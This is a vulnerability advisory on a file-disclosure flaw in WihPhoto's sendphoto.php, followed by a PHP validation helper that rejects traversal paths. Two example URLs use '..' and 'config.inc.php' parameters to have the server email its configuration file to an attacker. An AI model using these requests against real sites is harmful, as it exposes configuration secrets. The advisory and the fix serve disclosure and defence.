source: https://www.securityfocus.com/bid/6929/info
A vulnerability has been reported for WihPhoto that may result in the disclosure of files to remote attackers.
The vulnerability exists due to inadequate verification of some URI parameters in the sendphoto.php script file.
An attacker can exploit this vulnerability by supplying arbitrary file paths as the values of these parameters. This causes WihPhoto to send an email with the attacker-specified file as an attachment.
http://www.example.org/sendphoto.php?album=..&pic=config.inc.php
http://www.example.org/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1
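
One way to perform the parameter verification that the advisory describes as inadequate, as an added example in PHP (not WihPhoto's code and not a vendor fix). The `resolve_photo` helper, the `PHOTO_ROOT` path, the extension list and the `<root>/<album>/<pic>` storage layout are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helper, not WihPhoto code.
// Assumption: photos are stored as <PHOTO_ROOT>/<album>/<pic>.
const PHOTO_ROOT  = '/var/www/photos';              // assumed location
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];  // assumed list

// Returns the canonical path of the requested photo, or null when the
// request must be rejected before any mail is built.
function resolve_photo(string $album, string $pic, string $root = PHOTO_ROOT): ?string
{
    // 1. Each parameter must be a single path component: no separators,
    //    no NUL bytes, and neither "." nor "..".
    foreach ([$album, $pic] as $part) {
        if ($part === '' || $part === '.' || $part === '..'
            || strpbrk($part, "/\\\0") !== false) {
            return null;
        }
    }

    // 2. Only image extensions may be attached, so a script or config
    //    file is refused even if it sits inside an album directory.
    $ext = strtolower(pathinfo($pic, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }

    // 3. Canonicalise and confirm the result is still below the root;
    //    this also catches symlinks that point outside it.
    $base = realpath($root);
    $path = realpath($root . DIRECTORY_SEPARATOR . $album . DIRECTORY_SEPARATOR . $pic);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// The parameter values from the advisory's example URL fail step 1
// and are rejected.
var_dump(resolve_photo('..', 'config.inc.php'));
```

The script would attach only the path returned by the helper and stop with an error response when it returns null.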